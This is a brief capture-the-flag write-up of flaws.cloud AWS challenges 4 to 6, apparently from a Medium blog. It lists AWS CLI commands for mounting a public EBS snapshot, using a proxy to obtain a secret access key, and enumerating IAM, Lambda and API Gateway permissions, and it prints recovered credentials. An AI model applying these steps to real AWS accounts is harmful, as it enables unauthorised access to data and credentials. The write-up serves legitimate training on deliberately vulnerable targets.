AWS Security(S3 buckets, ec2 snapshots, leaked AWS keys, permissions to read IAM policies) challenge

Challenge 4:


  • It asks for creds that we don’t have.
  • A snapshot of this instance was created after deploying.
  • Challenge is to access this ec2 instance.
  1. Snapshots- It is given that snapshot is created for this instance. Snapshots can be made public, which poses a huge risk.
aws --profile terraform  ec2 describe-snapshots --region us-west-2 --filters "Name=volume-size,Values=8" "Name=status,Values=completed" "Name=storage-tier,Values=standard" > us-west-2_8GiB_standardtier.txt
aws --profile flaws sts get-caller-identity
aws --profile terraform  ec2 describe-snapshots --owner-id 975426262029 --region us-west-2
aws --profile terraform ec2 create-volume --region us-west-2  --snapshot-id  snap-0b49342abd1bdcb89 --availability-zone us-west-2c
fdisk -l
mkdir /mnt/volume_ext
lsblk -f
mount -t ext4 /dev/xvdf1  /mnt/volume_ext
flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
Authorization: Basic Zmxhd3M6bkNQOHhpZ2RqcGp5aVhnSjduSnU3cnc1Um82OGlFOE0=

Challenge 5:

We are provided with a HTTP web proxy server that is running on an ec2 instance.<your website>/
"SecretAccessKey" : "oqzfuYcxUnzlDPiIU/LLrlvOUYseSzZCShqgLHK3",
aws --profile flaws_lvl5 s3 ls

Challenge 6:

We are provided with aws creds. It is specified SecurityAudit policy is attached to this account.

aws --profile flaws_lvl6 iam get-user
aws --profile flaws_lvl6 sts get-caller-identity
aws --profile flaws_lvl6 iam list-attached-user-policies --user-name Level6
aws --profile flaws_lvl6 iam get-policy  --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
aws --profile flaws_lvl6 iam get-policy-version  --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
aws --region us-west-2 --profile level6 lambda list-functions
  • restapi_id
  • region(we already know)
  • stage_name
aws --region us-west-2 --profile flaws_lvl6 lambda get-policy --function-name Level6
  • restapi_id: s33ppypa75
aws --profile flaws_lvl6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
  • stage_name: Prod



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store



Tries to understand computers. I know little bit of most things. Definitely not an expert. Usually plays HTB (ID-23862).